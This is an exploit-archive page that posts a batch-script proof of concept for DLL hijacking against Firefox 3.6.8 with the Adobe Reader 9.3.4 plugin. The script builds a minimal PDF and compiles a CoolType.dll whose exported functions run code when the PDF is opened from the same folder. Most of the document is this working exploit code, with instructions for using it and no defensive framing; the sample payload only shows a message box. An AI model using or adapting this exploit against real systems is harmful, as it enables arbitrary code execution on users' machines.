Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 (CoolTyp

Posted on 27 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 (CoolType.dll)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================
Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 (CoolType.dll)
==================================================================

@echo off
GOTO START

* [*]
* [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)
* [*]
* [*] Author: Rh0 (Rh0[at].z1p.biz)
* [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218
* [*] Tested on:  Windows XP Pro SP3 x86 En
* [*] Description:
*
* Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd
*
* When Firefox plugins are used, the necessary DLLs for the plugin to run
* are searched in folders in the following order:
*
* mozilla firefox dir
* windows system32 dir
* windows system dir
* windows dir
* current dir &lt;-- hijack possibility
* plugin program dir
*
* Hence, depending on the actual file, the plugin and the needed DLLs, plugin DLLs can be hijacked.
* just 2 examples for the Adobe Reader plugin:
* CoolType.dll
* authplay.dll (if the pdf contains an embedded swf file)
*
* This Batch File example creates an mininal pdf file, CoolType.c and
* compiles it to CoolType.dll (gcc has to be installed).
* When opening the pdf with Firefox, CoolType.dll gets executed, if both files are in the same directory.
* So embedded pdf files in a html file could be used to hijack Adobe Reader DLLs.
* For this  exploit to work, Firefox and the Adober Reader 9.3.4 plugin have to be installed.
* To test the other extensions simply change the extension of the pdf file, and open it with firefox


:START

echo.
echo [*] 

echo [*] Creating pdf file...

REM PDF FILENAME
set pdf=OpenwithFirefox.pdf

echo %%PDF-1.4&gt;&quot;%pdf%&quot;
echo %%Çìó¢&gt;&gt;&quot;%pdf%&quot;
echo 1 0 obj ^&lt;^&lt; /Type /Catalog /ViewerPreferences ^&lt;^&lt; /NonFullScreenPageMode /UseNone ^&gt;^&gt; /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^&gt;^&gt; endobj&gt;&gt;&quot;%pdf%&quot;
echo 2 0 obj ^&lt;^&lt; /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^&gt;^&gt; endobj&gt;&gt;&quot;%pdf%&quot;
echo 3 0 obj ^&lt;^&lt; /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^&gt;^&gt; endobj&gt;&gt;&quot;%pdf%&quot;
echo 4 0 obj ^&lt;^&lt; /Producer (PDF::API2 0.69 [linux]) ^&gt;^&gt; endobj&gt;&gt;&quot;%pdf%&quot;
echo 5 0 obj ^&lt;^&lt; /Type /Page /Parent 2 0 R /Resources ^&lt;^&lt; /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^&gt;^&gt; ^&gt;^&gt; endobj&gt;&gt;&quot;%pdf%&quot;
echo xref&gt;&gt;&quot;%pdf%&quot;
echo 0 6 &gt;&gt;&quot;%pdf%&quot;
echo 0000000000 65535 f&gt;&gt;&quot;%pdf%&quot;
echo 0000000015 00000 n&gt;&gt;&quot;%pdf%&quot;
echo 0000000164 00000 n&gt;&gt;&quot;%pdf%&quot;
echo 0000000240 00000 n&gt;&gt;&quot;%pdf%&quot;
echo 0000000309 00000 n&gt;&gt;&quot;%pdf%&quot; 
echo 0000000365 00000 n&gt;&gt;&quot;%pdf%&quot; 
echo trailer&gt;&gt;&quot;%pdf%&quot;
echo ^&lt;^&lt; /Root 1 0 R /Size 6 /Info 4 0 R ^&gt;^&gt;&gt;&gt;&quot;%pdf%&quot;
echo startxref&gt;&gt;&quot;%pdf%&quot;
echo 477&gt;&gt;&quot;%pdf%&quot;
echo %%%%EOF&gt;&gt;&quot;%pdf%&quot;

echo [*] %pdf% created.

echo [*]

echo [*] Creating CoolType.c source...

REM PDF FILENAME
set dllsrc=CoolType.c

echo #include ^&lt;windows.h^&gt;&gt;&quot;%dllsrc%&quot;
echo #define DLLExport __declspec (dllexport)&gt;&gt;&quot;%dllsrc%&quot;
echo int runme()&gt;&gt;&quot;%dllsrc%&quot;
echo {&gt;&gt;&quot;%dllsrc%&quot;
echo   MessageBox(0, &quot;Firefox with Adobe Reader Plugin DLL Hijacking&quot;, &quot;Message from CoolType.dll&quot;, MB_OK);&gt;&gt;&quot;%dllsrc%&quot;
echo   return 0;&gt;&gt;&quot;%dllsrc%&quot;
echo }&gt;&gt;&quot;%dllsrc%&quot;
echo DLLExport void CTCleanup() { runme(); }&gt;&gt;&quot;%dllsrc%&quot;
echo DLLExport void CTGetVersion() { runme(); }&gt;&gt;&quot;%dllsrc%&quot;
echo DLLExport void CTInit() { runme(); }&gt;&gt;&quot;%dllsrc%&quot;
echo [*] Done.

echo [*] Compiling CoolType.dll...
gcc -shared -o CoolType.dll CoolType.c

echo [*] Done
echo [*]
echo [*] Copy &quot;%pdf%&quot; and CoolType.dll to the same 
echo [*] directory, open directory in windows explorer
echo [*] and open &quot;%pdf%&quot; in Firefox.
echo [*]
pause


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20